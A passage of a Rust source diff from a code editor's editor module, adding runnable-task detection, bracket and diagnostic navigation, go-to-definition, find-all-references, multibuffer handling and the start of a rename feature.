display_snapshot + .buffer_snapshot + .anchor_in_excerpt(excerpt_id, location.target.range.start) + } else { + None + } + }, + ); + if let Some(offset) = offset { + let task_buffer_range = + location.target.range.to_point(&buffer_snapshot); + let context_buffer_range = + task_buffer_range.to_offset(&buffer_snapshot); + let context_range = BufferOffset(context_buffer_range.start) + ..BufferOffset(context_buffer_range.end); + + acc.entry((buffer_snapshot.remote_id(), task_buffer_range.start.row)) + .or_insert_with(|| RunnableTasks { + templates: Vec::new(), + offset, + column: task_buffer_range.start.column, + extra_variables: HashMap::default(), + context_range, + }) + .templates + .push((kind, task.original_task().clone())); + } + + acc + }) + }) else { + return; + }; + + let rows = Self::runnable_rows(project, display_snapshot, new_rows, cx.clone()); + editor + .update(cx, |editor, _| { + editor.clear_tasks(); + for (key, mut value) in rows { + if let Some(lsp_tasks) = lsp_tasks_by_rows.remove(&key) { + value.templates.extend(lsp_tasks.templates); + } + + editor.insert_tasks(key, value); + } + for (key, value) in lsp_tasks_by_rows { + editor.insert_tasks(key, value); + } + }) + .ok(); + }) + } + fn fetch_runnable_ranges( + snapshot: &DisplaySnapshot, + range: Range, + ) -> Vec { + snapshot.buffer_snapshot.runnable_ranges(range).collect() + } + + fn runnable_rows( + project: Entity, + snapshot: DisplaySnapshot, + runnable_ranges: Vec, + mut cx: AsyncWindowContext, + ) -> Vec<((BufferId, BufferRow), RunnableTasks)> { + runnable_ranges + .into_iter() + .filter_map(|mut runnable| { + let tasks = cx + .update(|_, cx| Self::templates_with_tags(&project, &mut runnable.runnable, cx)) + .ok()?; + if tasks.is_empty() { + return None; + } + + let point = runnable.run_range.start.to_point(&snapshot.buffer_snapshot); + + let row = snapshot + .buffer_snapshot + .buffer_line_for_row(MultiBufferRow(point.row))? + .1 + .start + .row; + + let context_range = + BufferOffset(runnable.full_range.start)..BufferOffset(runnable.full_range.end); + Some(( + (runnable.buffer_id, row), + RunnableTasks { + templates: tasks, + offset: snapshot + .buffer_snapshot + .anchor_before(runnable.run_range.start), + context_range, + column: point.column, + extra_variables: runnable.extra_captures, + }, + )) + }) + .collect() + } + + fn templates_with_tags( + project: &Entity, + runnable: &mut Runnable, + cx: &mut App, + ) -> Vec<(TaskSourceKind, TaskTemplate)> { + let (inventory, worktree_id, file) = project.read_with(cx, |project, cx| { + let (worktree_id, file) = project + .buffer_for_id(runnable.buffer, cx) + .and_then(|buffer| buffer.read(cx).file()) + .map(|file| (file.worktree_id(cx), file.clone())) + .unzip(); + + ( + project.task_store().read(cx).task_inventory().cloned(), + worktree_id, + file, + ) + }); + + let mut templates_with_tags = mem::take(&mut runnable.tags) + .into_iter() + .flat_map(|RunnableTag(tag)| { + inventory + .as_ref() + .into_iter() + .flat_map(|inventory| { + inventory.read(cx).list_tasks( + file.clone(), + Some(runnable.language.clone()), + worktree_id, + cx, + ) + }) + .filter(move |(_, template)| { + template.tags.iter().any(|source_tag| source_tag == &tag) + }) + }) + .sorted_by_key(|(kind, _)| kind.to_owned()) + .collect::>(); + if let Some((leading_tag_source, _)) = templates_with_tags.first() { + // Strongest source wins; if we have worktree tag binding, prefer that to + // global and language bindings; + // if we have a global binding, prefer that to language binding. + let first_mismatch = templates_with_tags + .iter() + .position(|(tag_source, _)| tag_source != leading_tag_source); + if let Some(index) = first_mismatch { + templates_with_tags.truncate(index); + } + } + + templates_with_tags + } + + pub fn move_to_enclosing_bracket( + &mut self, + _: &MoveToEnclosingBracket, + window: &mut Window, + cx: &mut Context, + ) { + self.hide_mouse_cursor(&HideMouseCursorOrigin::MovementAction); + self.change_selections(Some(Autoscroll::fit()), window, cx, |s| { + s.move_offsets_with(|snapshot, selection| { + let Some(enclosing_bracket_ranges) = + snapshot.enclosing_bracket_ranges(selection.start..selection.end) + else { + return; + }; + + let mut best_length = usize::MAX; + let mut best_inside = false; + let mut best_in_bracket_range = false; + let mut best_destination = None; + for (open, close) in enclosing_bracket_ranges { + let close = close.to_inclusive(); + let length = close.end() - open.start; + let inside = selection.start >= open.end && selection.end <= *close.start(); + let in_bracket_range = open.to_inclusive().contains(&selection.head()) + || close.contains(&selection.head()); + + // If best is next to a bracket and current isn't, skip + if !in_bracket_range && best_in_bracket_range { + continue; + } + + // Prefer smaller lengths unless best is inside and current isn't + if length > best_length && (best_inside || !inside) { + continue; + } + + best_length = length; + best_inside = inside; + best_in_bracket_range = in_bracket_range; + best_destination = Some( + if close.contains(&selection.start) && close.contains(&selection.end) { + if inside { open.end } else { open.start } + } else if inside { + *close.start() + } else { + *close.end() + }, + ); + } + + if let Some(destination) = best_destination { + selection.collapse_to(destination, SelectionGoal::None); + } + }) + }); + } + + pub fn undo_selection( + &mut self, + _: &UndoSelection, + window: &mut Window, + cx: &mut Context, + ) { + self.hide_mouse_cursor(&HideMouseCursorOrigin::MovementAction); + self.end_selection(window, cx); + self.selection_history.mode = SelectionHistoryMode::Undoing; + if let Some(entry) = self.selection_history.undo_stack.pop_back() { + self.change_selections(None, window, cx, |s| { + s.select_anchors(entry.selections.to_vec()) + }); + self.select_next_state = entry.select_next_state; + self.select_prev_state = entry.select_prev_state; + self.add_selections_state = entry.add_selections_state; + self.request_autoscroll(Autoscroll::newest(), cx); + } + self.selection_history.mode = SelectionHistoryMode::Normal; + } + + pub fn redo_selection( + &mut self, + _: &RedoSelection, + window: &mut Window, + cx: &mut Context, + ) { + self.hide_mouse_cursor(&HideMouseCursorOrigin::MovementAction); + self.end_selection(window, cx); + self.selection_history.mode = SelectionHistoryMode::Redoing; + if let Some(entry) = self.selection_history.redo_stack.pop_back() { + self.change_selections(None, window, cx, |s| { + s.select_anchors(entry.selections.to_vec()) + }); + self.select_next_state = entry.select_next_state; + self.select_prev_state = entry.select_prev_state; + self.add_selections_state = entry.add_selections_state; + self.request_autoscroll(Autoscroll::newest(), cx); + } + self.selection_history.mode = SelectionHistoryMode::Normal; + } + + pub fn expand_excerpts( + &mut self, + action: &ExpandExcerpts, + _: &mut Window, + cx: &mut Context, + ) { + self.expand_excerpts_for_direction(action.lines, ExpandExcerptDirection::UpAndDown, cx) + } + + pub fn expand_excerpts_down( + &mut self, + action: &ExpandExcerptsDown, + _: &mut Window, + cx: &mut Context, + ) { + self.expand_excerpts_for_direction(action.lines, ExpandExcerptDirection::Down, cx) + } + + pub fn expand_excerpts_up( + &mut self, + action: &ExpandExcerptsUp, + _: &mut Window, + cx: &mut Context, + ) { + self.expand_excerpts_for_direction(action.lines, ExpandExcerptDirection::Up, cx) + } + + pub fn expand_excerpts_for_direction( + &mut self, + lines: u32, + direction: ExpandExcerptDirection, + + cx: &mut Context, + ) { + let selections = self.selections.disjoint_anchors(); + + let lines = if lines == 0 { + EditorSettings::get_global(cx).expand_excerpt_lines + } else { + lines + }; + + self.buffer.update(cx, |buffer, cx| { + let snapshot = buffer.snapshot(cx); + let mut excerpt_ids = selections + .iter() + .flat_map(|selection| snapshot.excerpt_ids_for_range(selection.range())) + .collect::>(); + excerpt_ids.sort(); + excerpt_ids.dedup(); + buffer.expand_excerpts(excerpt_ids, lines, direction, cx) + }) + } + + pub fn expand_excerpt( + &mut self, + excerpt: ExcerptId, + direction: ExpandExcerptDirection, + window: &mut Window, + cx: &mut Context, + ) { + let current_scroll_position = self.scroll_position(cx); + let lines_to_expand = EditorSettings::get_global(cx).expand_excerpt_lines; + let mut should_scroll_up = false; + + if direction == ExpandExcerptDirection::Down { + let multi_buffer = self.buffer.read(cx); + let snapshot = multi_buffer.snapshot(cx); + if let Some(buffer_id) = snapshot.buffer_id_for_excerpt(excerpt) { + if let Some(buffer) = multi_buffer.buffer(buffer_id) { + if let Some(excerpt_range) = snapshot.buffer_range_for_excerpt(excerpt) { + let buffer_snapshot = buffer.read(cx).snapshot(); + let excerpt_end_row = + Point::from_anchor(&excerpt_range.end, &buffer_snapshot).row; + let last_row = buffer_snapshot.max_point().row; + let lines_below = last_row.saturating_sub(excerpt_end_row); + should_scroll_up = lines_below >= lines_to_expand; + } + } + } + } + + self.buffer.update(cx, |buffer, cx| { + buffer.expand_excerpts([excerpt], lines_to_expand, direction, cx) + }); + + if should_scroll_up { + let new_scroll_position = + current_scroll_position + gpui::Point::new(0.0, lines_to_expand as f32); + self.set_scroll_position(new_scroll_position, window, cx); + } + } + + pub fn go_to_singleton_buffer_point( + &mut self, + point: Point, + window: &mut Window, + cx: &mut Context, + ) { + self.go_to_singleton_buffer_range(point..point, window, cx); + } + + pub fn go_to_singleton_buffer_range( + &mut self, + range: Range, + window: &mut Window, + cx: &mut Context, + ) { + let multibuffer = self.buffer().read(cx); + let Some(buffer) = multibuffer.as_singleton() else { + return; + }; + let Some(start) = multibuffer.buffer_point_to_anchor(&buffer, range.start, cx) else { + return; + }; + let Some(end) = multibuffer.buffer_point_to_anchor(&buffer, range.end, cx) else { + return; + }; + self.change_selections(Some(Autoscroll::center()), window, cx, |s| { + s.select_anchor_ranges([start..end]) + }); + } + + pub fn go_to_diagnostic( + &mut self, + _: &GoToDiagnostic, + window: &mut Window, + cx: &mut Context, + ) { + self.hide_mouse_cursor(&HideMouseCursorOrigin::MovementAction); + self.go_to_diagnostic_impl(Direction::Next, window, cx) + } + + pub fn go_to_prev_diagnostic( + &mut self, + _: &GoToPreviousDiagnostic, + window: &mut Window, + cx: &mut Context, + ) { + self.hide_mouse_cursor(&HideMouseCursorOrigin::MovementAction); + self.go_to_diagnostic_impl(Direction::Prev, window, cx) + } + + pub fn go_to_diagnostic_impl( + &mut self, + direction: Direction, + window: &mut Window, + cx: &mut Context, + ) { + let buffer = self.buffer.read(cx).snapshot(cx); + let selection = self.selections.newest::(cx); + + let mut active_group_id = None; + if let ActiveDiagnostic::Group(active_group) = &self.active_diagnostics { + if active_group.active_range.start.to_offset(&buffer) == selection.start { + active_group_id = Some(active_group.group_id); + } + } + + fn filtered( + snapshot: EditorSnapshot, + diagnostics: impl Iterator>, + ) -> impl Iterator> { + diagnostics + .filter(|entry| entry.range.start != entry.range.end) + .filter(|entry| !entry.diagnostic.is_unnecessary) + .filter(move |entry| !snapshot.intersects_fold(entry.range.start)) + } + + let snapshot = self.snapshot(window, cx); + let before = filtered( + snapshot.clone(), + buffer + .diagnostics_in_range(0..selection.start) + .filter(|entry| entry.range.start <= selection.start), + ); + let after = filtered( + snapshot, + buffer + .diagnostics_in_range(selection.start..buffer.len()) + .filter(|entry| entry.range.start >= selection.start), + ); + + let mut found: Option> = None; + if direction == Direction::Prev { + 'outer: for prev_diagnostics in [before.collect::>(), after.collect::>()] + { + for diagnostic in prev_diagnostics.into_iter().rev() { + if diagnostic.range.start != selection.start + || active_group_id + .is_some_and(|active| diagnostic.diagnostic.group_id < active) + { + found = Some(diagnostic); + break 'outer; + } + } + } + } else { + for diagnostic in after.chain(before) { + if diagnostic.range.start != selection.start + || active_group_id.is_some_and(|active| diagnostic.diagnostic.group_id > active) + { + found = Some(diagnostic); + break; + } + } + } + let Some(next_diagnostic) = found else { + return; + }; + + let Some(buffer_id) = buffer.anchor_after(next_diagnostic.range.start).buffer_id else { + return; + }; + self.change_selections(Some(Autoscroll::fit()), window, cx, |s| { + s.select_ranges(vec![ + next_diagnostic.range.start..next_diagnostic.range.start, + ]) + }); + self.activate_diagnostics(buffer_id, next_diagnostic, window, cx); + self.refresh_inline_completion(false, true, window, cx); + } + + fn go_to_next_hunk(&mut self, _: &GoToHunk, window: &mut Window, cx: &mut Context) { + self.hide_mouse_cursor(&HideMouseCursorOrigin::MovementAction); + let snapshot = self.snapshot(window, cx); + let selection = self.selections.newest::(cx); + self.go_to_hunk_before_or_after_position( + &snapshot, + selection.head(), + Direction::Next, + window, + cx, + ); + } + + pub fn go_to_hunk_before_or_after_position( + &mut self, + snapshot: &EditorSnapshot, + position: Point, + direction: Direction, + window: &mut Window, + cx: &mut Context, + ) { + let row = if direction == Direction::Next { + self.hunk_after_position(snapshot, position) + .map(|hunk| hunk.row_range.start) + } else { + self.hunk_before_position(snapshot, position) + }; + + if let Some(row) = row { + let destination = Point::new(row.0, 0); + let autoscroll = Autoscroll::center(); + + self.unfold_ranges(&[destination..destination], false, false, cx); + self.change_selections(Some(autoscroll), window, cx, |s| { + s.select_ranges([destination..destination]); + }); + } + } + + fn hunk_after_position( + &mut self, + snapshot: &EditorSnapshot, + position: Point, + ) -> Option { + snapshot + .buffer_snapshot + .diff_hunks_in_range(position..snapshot.buffer_snapshot.max_point()) + .find(|hunk| hunk.row_range.start.0 > position.row) + .or_else(|| { + snapshot + .buffer_snapshot + .diff_hunks_in_range(Point::zero()..position) + .find(|hunk| hunk.row_range.end.0 < position.row) + }) + } + + fn go_to_prev_hunk( + &mut self, + _: &GoToPreviousHunk, + window: &mut Window, + cx: &mut Context, + ) { + self.hide_mouse_cursor(&HideMouseCursorOrigin::MovementAction); + let snapshot = self.snapshot(window, cx); + let selection = self.selections.newest::(cx); + self.go_to_hunk_before_or_after_position( + &snapshot, + selection.head(), + Direction::Prev, + window, + cx, + ); + } + + fn hunk_before_position( + &mut self, + snapshot: &EditorSnapshot, + position: Point, + ) -> Option { + snapshot + .buffer_snapshot + .diff_hunk_before(position) + .or_else(|| snapshot.buffer_snapshot.diff_hunk_before(Point::MAX)) + } + + fn go_to_next_change( + &mut self, + _: &GoToNextChange, + window: &mut Window, + cx: &mut Context, + ) { + if let Some(selections) = self + .change_list + .next_change(1, Direction::Next) + .map(|s| s.to_vec()) + { + self.change_selections(Some(Autoscroll::fit()), window, cx, |s| { + let map = s.display_map(); + s.select_display_ranges(selections.iter().map(|a| { + let point = a.to_display_point(&map); + point..point + })) + }) + } + } + + fn go_to_previous_change( + &mut self, + _: &GoToPreviousChange, + window: &mut Window, + cx: &mut Context, + ) { + if let Some(selections) = self + .change_list + .next_change(1, Direction::Prev) + .map(|s| s.to_vec()) + { + self.change_selections(Some(Autoscroll::fit()), window, cx, |s| { + let map = s.display_map(); + s.select_display_ranges(selections.iter().map(|a| { + let point = a.to_display_point(&map); + point..point + })) + }) + } + } + + fn go_to_line( + &mut self, + position: Anchor, + highlight_color: Option, + window: &mut Window, + cx: &mut Context, + ) { + let snapshot = self.snapshot(window, cx).display_snapshot; + let position = position.to_point(&snapshot.buffer_snapshot); + let start = snapshot + .buffer_snapshot + .clip_point(Point::new(position.row, 0), Bias::Left); + let end = start + Point::new(1, 0); + let start = snapshot.buffer_snapshot.anchor_before(start); + let end = snapshot.buffer_snapshot.anchor_before(end); + + self.highlight_rows::( + start..end, + highlight_color + .unwrap_or_else(|| cx.theme().colors().editor_highlighted_line_background), + Default::default(), + cx, + ); + self.request_autoscroll(Autoscroll::center().for_anchor(start), cx); + } + + pub fn go_to_definition( + &mut self, + _: &GoToDefinition, + window: &mut Window, + cx: &mut Context, + ) -> Task> { + let definition = + self.go_to_definition_of_kind(GotoDefinitionKind::Symbol, false, window, cx); + let fallback_strategy = EditorSettings::get_global(cx).go_to_definition_fallback; + cx.spawn_in(window, async move |editor, cx| { + if definition.await? == Navigated::Yes { + return Ok(Navigated::Yes); + } + match fallback_strategy { + GoToDefinitionFallback::None => Ok(Navigated::No), + GoToDefinitionFallback::FindAllReferences => { + match editor.update_in(cx, |editor, window, cx| { + editor.find_all_references(&FindAllReferences, window, cx) + })? { + Some(references) => references.await, + None => Ok(Navigated::No), + } + } + } + }) + } + + pub fn go_to_declaration( + &mut self, + _: &GoToDeclaration, + window: &mut Window, + cx: &mut Context, + ) -> Task> { + self.go_to_definition_of_kind(GotoDefinitionKind::Declaration, false, window, cx) + } + + pub fn go_to_declaration_split( + &mut self, + _: &GoToDeclaration, + window: &mut Window, + cx: &mut Context, + ) -> Task> { + self.go_to_definition_of_kind(GotoDefinitionKind::Declaration, true, window, cx) + } + + pub fn go_to_implementation( + &mut self, + _: &GoToImplementation, + window: &mut Window, + cx: &mut Context, + ) -> Task> { + self.go_to_definition_of_kind(GotoDefinitionKind::Implementation, false, window, cx) + } + + pub fn go_to_implementation_split( + &mut self, + _: &GoToImplementationSplit, + window: &mut Window, + cx: &mut Context, + ) -> Task> { + self.go_to_definition_of_kind(GotoDefinitionKind::Implementation, true, window, cx) + } + + pub fn go_to_type_definition( + &mut self, + _: &GoToTypeDefinition, + window: &mut Window, + cx: &mut Context, + ) -> Task> { + self.go_to_definition_of_kind(GotoDefinitionKind::Type, false, window, cx) + } + + pub fn go_to_definition_split( + &mut self, + _: &GoToDefinitionSplit, + window: &mut Window, + cx: &mut Context, + ) -> Task> { + self.go_to_definition_of_kind(GotoDefinitionKind::Symbol, true, window, cx) + } + + pub fn go_to_type_definition_split( + &mut self, + _: &GoToTypeDefinitionSplit, + window: &mut Window, + cx: &mut Context, + ) -> Task> { + self.go_to_definition_of_kind(GotoDefinitionKind::Type, true, window, cx) + } + + fn go_to_definition_of_kind( + &mut self, + kind: GotoDefinitionKind, + split: bool, + window: &mut Window, + cx: &mut Context, + ) -> Task> { + let Some(provider) = self.semantics_provider.clone() else { + return Task::ready(Ok(Navigated::No)); + }; + let head = self.selections.newest::(cx).head(); + let buffer = self.buffer.read(cx); + let (buffer, head) = if let Some(text_anchor) = buffer.text_anchor_for_position(head, cx) { + text_anchor + } else { + return Task::ready(Ok(Navigated::No)); + }; + + let Some(definitions) = provider.definitions(&buffer, head, kind, cx) else { + return Task::ready(Ok(Navigated::No)); + }; + + cx.spawn_in(window, async move |editor, cx| { + let definitions = definitions.await?; + let navigated = editor + .update_in(cx, |editor, window, cx| { + editor.navigate_to_hover_links( + Some(kind), + definitions + .into_iter() + .filter(|location| { + hover_links::exclude_link_to_position(&buffer, &head, location, cx) + }) + .map(HoverLink::Text) + .collect::>(), + split, + window, + cx, + ) + })? + .await?; + anyhow::Ok(navigated) + }) + } + + pub fn open_url(&mut self, _: &OpenUrl, window: &mut Window, cx: &mut Context) { + let selection = self.selections.newest_anchor(); + let head = selection.head(); + let tail = selection.tail(); + + let Some((buffer, start_position)) = + self.buffer.read(cx).text_anchor_for_position(head, cx) + else { + return; + }; + + let end_position = if head != tail { + let Some((_, pos)) = self.buffer.read(cx).text_anchor_for_position(tail, cx) else { + return; + }; + Some(pos) + } else { + None + }; + + let url_finder = cx.spawn_in(window, async move |editor, cx| { + let url = if let Some(end_pos) = end_position { + find_url_from_range(&buffer, start_position..end_pos, cx.clone()) + } else { + find_url(&buffer, start_position, cx.clone()).map(|(_, url)| url) + }; + + if let Some(url) = url { + editor.update(cx, |_, cx| { + cx.open_url(&url); + }) + } else { + Ok(()) + } + }); + + url_finder.detach(); + } + + pub fn open_selected_filename( + &mut self, + _: &OpenSelectedFilename, + window: &mut Window, + cx: &mut Context, + ) { + let Some(workspace) = self.workspace() else { + return; + }; + + let position = self.selections.newest_anchor().head(); + + let Some((buffer, buffer_position)) = + self.buffer.read(cx).text_anchor_for_position(position, cx) + else { + return; + }; + + let project = self.project.clone(); + + cx.spawn_in(window, async move |_, cx| { + let result = find_file(&buffer, project, buffer_position, cx).await; + + if let Some((_, path)) = result { + workspace + .update_in(cx, |workspace, window, cx| { + workspace.open_resolved_path(path, window, cx) + })? + .await?; + } + anyhow::Ok(()) + }) + .detach(); + } + + pub(crate) fn navigate_to_hover_links( + &mut self, + kind: Option, + mut definitions: Vec, + split: bool, + window: &mut Window, + cx: &mut Context, + ) -> Task> { + // If there is one definition, just open it directly + if definitions.len() == 1 { + let definition = definitions.pop().unwrap(); + + enum TargetTaskResult { + Location(Option), + AlreadyNavigated, + } + + let target_task = match definition { + HoverLink::Text(link) => { + Task::ready(anyhow::Ok(TargetTaskResult::Location(Some(link.target)))) + } + HoverLink::InlayHint(lsp_location, server_id) => { + let computation = + self.compute_target_location(lsp_location, server_id, window, cx); + cx.background_spawn(async move { + let location = computation.await?; + Ok(TargetTaskResult::Location(location)) + }) + } + HoverLink::Url(url) => { + cx.open_url(&url); + Task::ready(Ok(TargetTaskResult::AlreadyNavigated)) + } + HoverLink::File(path) => { + if let Some(workspace) = self.workspace() { + cx.spawn_in(window, async move |_, cx| { + workspace + .update_in(cx, |workspace, window, cx| { + workspace.open_resolved_path(path, window, cx) + })? + .await + .map(|_| TargetTaskResult::AlreadyNavigated) + }) + } else { + Task::ready(Ok(TargetTaskResult::Location(None))) + } + } + }; + cx.spawn_in(window, async move |editor, cx| { + let target = match target_task.await.context("target resolution task")? { + TargetTaskResult::AlreadyNavigated => return Ok(Navigated::Yes), + TargetTaskResult::Location(None) => return Ok(Navigated::No), + TargetTaskResult::Location(Some(target)) => target, + }; + + editor.update_in(cx, |editor, window, cx| { + let Some(workspace) = editor.workspace() else { + return Navigated::No; + }; + let pane = workspace.read(cx).active_pane().clone(); + + let range = target.range.to_point(target.buffer.read(cx)); + let range = editor.range_for_match(&range); + let range = collapse_multiline_range(range); + + if !split + && Some(&target.buffer) == editor.buffer.read(cx).as_singleton().as_ref() + { + editor.go_to_singleton_buffer_range(range.clone(), window, cx); + } else { + window.defer(cx, move |window, cx| { + let target_editor: Entity = + workspace.update(cx, |workspace, cx| { + let pane = if split { + workspace.adjacent_pane(window, cx) + } else { + workspace.active_pane().clone() + }; + + workspace.open_project_item( + pane, + target.buffer.clone(), + true, + true, + window, + cx, + ) + }); + target_editor.update(cx, |target_editor, cx| { + // When selecting a definition in a different buffer, disable the nav history + // to avoid creating a history entry at the previous cursor location. + pane.update(cx, |pane, _| pane.disable_history()); + target_editor.go_to_singleton_buffer_range(range, window, cx); + pane.update(cx, |pane, _| pane.enable_history()); + }); + }); + } + Navigated::Yes + }) + }) + } else if !definitions.is_empty() { + cx.spawn_in(window, async move |editor, cx| { + let (title, location_tasks, workspace) = editor + .update_in(cx, |editor, window, cx| { + let tab_kind = match kind { + Some(GotoDefinitionKind::Implementation) => "Implementations", + _ => "Definitions", + }; + let title = definitions + .iter() + .find_map(|definition| match definition { + HoverLink::Text(link) => link.origin.as_ref().map(|origin| { + let buffer = origin.buffer.read(cx); + format!( + "{} for {}", + tab_kind, + buffer + .text_for_range(origin.range.clone()) + .collect::() + ) + }), + HoverLink::InlayHint(_, _) => None, + HoverLink::Url(_) => None, + HoverLink::File(_) => None, + }) + .unwrap_or(tab_kind.to_string()); + let location_tasks = definitions + .into_iter() + .map(|definition| match definition { + HoverLink::Text(link) => Task::ready(Ok(Some(link.target))), + HoverLink::InlayHint(lsp_location, server_id) => editor + .compute_target_location(lsp_location, server_id, window, cx), + HoverLink::Url(_) => Task::ready(Ok(None)), + HoverLink::File(_) => Task::ready(Ok(None)), + }) + .collect::>(); + (title, location_tasks, editor.workspace().clone()) + }) + .context("location tasks preparation")?; + + let locations = future::join_all(location_tasks) + .await + .into_iter() + .filter_map(|location| location.transpose()) + .collect::>() + .context("location tasks")?; + + let Some(workspace) = workspace else { + return Ok(Navigated::No); + }; + let opened = workspace + .update_in(cx, |workspace, window, cx| { + Self::open_locations_in_multibuffer( + workspace, + locations, + title, + split, + MultibufferSelectionMode::First, + window, + cx, + ) + }) + .ok(); + + anyhow::Ok(Navigated::from_bool(opened.is_some())) + }) + } else { + Task::ready(Ok(Navigated::No)) + } + } + + fn compute_target_location( + &self, + lsp_location: lsp::Location, + server_id: LanguageServerId, + window: &mut Window, + cx: &mut Context, + ) -> Task>> { + let Some(project) = self.project.clone() else { + return Task::ready(Ok(None)); + }; + + cx.spawn_in(window, async move |editor, cx| { + let location_task = editor.update(cx, |_, cx| { + project.update(cx, |project, cx| { + let language_server_name = project + .language_server_statuses(cx) + .find(|(id, _)| server_id == *id) + .map(|(_, status)| LanguageServerName::from(status.name.as_str())); + language_server_name.map(|language_server_name| { + project.open_local_buffer_via_lsp( + lsp_location.uri.clone(), + server_id, + language_server_name, + cx, + ) + }) + }) + })?; + let location = match location_task { + Some(task) => Some({ + let target_buffer_handle = task.await.context("open local buffer")?; + let range = target_buffer_handle.update(cx, |target_buffer, _| { + let target_start = target_buffer + .clip_point_utf16(point_from_lsp(lsp_location.range.start), Bias::Left); + let target_end = target_buffer + .clip_point_utf16(point_from_lsp(lsp_location.range.end), Bias::Left); + target_buffer.anchor_after(target_start) + ..target_buffer.anchor_before(target_end) + })?; + Location { + buffer: target_buffer_handle, + range, + } + }), + None => None, + }; + Ok(location) + }) + } + + pub fn find_all_references( + &mut self, + _: &FindAllReferences, + window: &mut Window, + cx: &mut Context, + ) -> Option>> { + let selection = self.selections.newest::(cx); + let multi_buffer = self.buffer.read(cx); + let head = selection.head(); + + let multi_buffer_snapshot = multi_buffer.snapshot(cx); + let head_anchor = multi_buffer_snapshot.anchor_at( + head, + if head < selection.tail() { + Bias::Right + } else { + Bias::Left + }, + ); + + match self + .find_all_references_task_sources + .binary_search_by(|anchor| anchor.cmp(&head_anchor, &multi_buffer_snapshot)) + { + Ok(_) => { + log::info!( + "Ignoring repeated FindAllReferences invocation with the position of already running task" + ); + return None; + } + Err(i) => { + self.find_all_references_task_sources.insert(i, head_anchor); + } + } + + let (buffer, head) = multi_buffer.text_anchor_for_position(head, cx)?; + let workspace = self.workspace()?; + let project = workspace.read(cx).project().clone(); + let references = project.update(cx, |project, cx| project.references(&buffer, head, cx)); + Some(cx.spawn_in(window, async move |editor, cx| { + let _cleanup = cx.on_drop(&editor, move |editor, _| { + if let Ok(i) = editor + .find_all_references_task_sources + .binary_search_by(|anchor| anchor.cmp(&head_anchor, &multi_buffer_snapshot)) + { + editor.find_all_references_task_sources.remove(i); + } + }); + + let locations = references.await?; + if locations.is_empty() { + return anyhow::Ok(Navigated::No); + } + + workspace.update_in(cx, |workspace, window, cx| { + let title = locations + .first() + .as_ref() + .map(|location| { + let buffer = location.buffer.read(cx); + format!( + "References to `{}`", + buffer + .text_for_range(location.range.clone()) + .collect::() + ) + }) + .unwrap(); + Self::open_locations_in_multibuffer( + workspace, + locations, + title, + false, + MultibufferSelectionMode::First, + window, + cx, + ); + Navigated::Yes + }) + })) + } + + /// Opens a multibuffer with the given project locations in it + pub fn open_locations_in_multibuffer( + workspace: &mut Workspace, + mut locations: Vec, + title: String, + split: bool, + multibuffer_selection_mode: MultibufferSelectionMode, + window: &mut Window, + cx: &mut Context, + ) { + // If there are multiple definitions, open them in a multibuffer + locations.sort_by_key(|location| location.buffer.read(cx).remote_id()); + let mut locations = locations.into_iter().peekable(); + let mut ranges: Vec> = Vec::new(); + let capability = workspace.project().read(cx).capability(); + + let excerpt_buffer = cx.new(|cx| { + let mut multibuffer = MultiBuffer::new(capability); + while let Some(location) = locations.next() { + let buffer = location.buffer.read(cx); + let mut ranges_for_buffer = Vec::new(); + let range = location.range.to_point(buffer); + ranges_for_buffer.push(range.clone()); + + while let Some(next_location) = locations.peek() { + if next_location.buffer == location.buffer { + ranges_for_buffer.push(next_location.range.to_point(buffer)); + locations.next(); + } else { + break; + } + } + + ranges_for_buffer.sort_by_key(|range| (range.start, Reverse(range.end))); + let (new_ranges, _) = multibuffer.set_excerpts_for_path( + PathKey::for_buffer(&location.buffer, cx), + location.buffer.clone(), + ranges_for_buffer, + DEFAULT_MULTIBUFFER_CONTEXT, + cx, + ); + ranges.extend(new_ranges) + } + + multibuffer.with_title(title) + }); + + let editor = cx.new(|cx| { + Editor::for_multibuffer( + excerpt_buffer, + Some(workspace.project().clone()), + window, + cx, + ) + }); + editor.update(cx, |editor, cx| { + match multibuffer_selection_mode { + MultibufferSelectionMode::First => { + if let Some(first_range) = ranges.first() { + editor.change_selections(None, window, cx, |selections| { + selections.clear_disjoint(); + selections.select_anchor_ranges(std::iter::once(first_range.clone())); + }); + } + editor.highlight_background::( + &ranges, + |theme| theme.editor_highlighted_line_background, + cx, + ); + } + MultibufferSelectionMode::All => { + editor.change_selections(None, window, cx, |selections| { + selections.clear_disjoint(); + selections.select_anchor_ranges(ranges); + }); + } + } + editor.register_buffers_with_language_servers(cx); + }); + + let item = Box::new(editor); + let item_id = item.item_id(); + + if split { + workspace.split_item(SplitDirection::Right, item.clone(), window, cx); + } else { + if PreviewTabsSettings::get_global(cx).enable_preview_from_code_navigation { + let (preview_item_id, preview_item_idx) = + workspace.active_pane().update(cx, |pane, _| { + (pane.preview_item_id(), pane.preview_item_idx()) + }); + + workspace.add_item_to_active_pane(item.clone(), preview_item_idx, true, window, cx); + + if let Some(preview_item_id) = preview_item_id { + workspace.active_pane().update(cx, |pane, cx| { + pane.remove_item(preview_item_id, false, false, window, cx); + }); + } + } else { + workspace.add_item_to_active_pane(item.clone(), None, true, window, cx); + } + } + workspace.active_pane().update(cx, |pane, cx| { + pane.set_preview_item_id(Some(item_id), cx); + }); + } + + pub fn rename( + &mut self, + _: &Rename, + window: &mut Window, + cx: &mut Context, + ) -> Option>> { + use language::ToOffset as _; + + let provider = self.semantics_provider.clone()?; + let selection = self.selections.newest_anchor().clone(); + let (cursor_buffer, cursor_buffer_position) = self + .buffer + .read(cx) + .text_anchor_for_position(selection.head(), cx)?; + let (tail_buffer, cursor_buffer_position_end) = self + .buffer + .read(cx) + .text_anchor_for_position(selection.tail(), cx)?; + if tail_buffer != cursor_buffer { + return None; + } + + let snapshot = cursor_buffer.read(cx).snapshot(); + let cursor_buffer_offset = cursor_buffer_position.to_offset(&snapshot); + let cursor_buffer_offset_end = cursor_buffer_position_end.to_offset(&snapshot); + let prepare_rename = provider + .range_for_rename(&cursor_buffer, cursor_buffer_position, cx) + .unwrap_or_else(|| Task::ready(Ok(None))); + drop(snapshot); + + Some(cx.spawn_in(window, async move |this, cx| { + let rename_range = if let Some(range) = prepare_rename.await? { + Some(range) + } else { + this.update(cx, |this, cx| { + let buffer = this.buffer.read(cx).snapshot(cx); + let mut buffer_highlights = this + .document_highlights_for_position(selection.head(), &buffer) + .filter(|highlight| { + highlight.start.excerpt_id == selection.head().excerpt_id + && highlight.end.excerpt_id == selection.head().excerpt_id + }); + buffer_highlights + .next() + .map(|highlight| highlight.start.text_anchor..highlight.end.text_anchor) + })? + }; + if let Some(rename_range) = 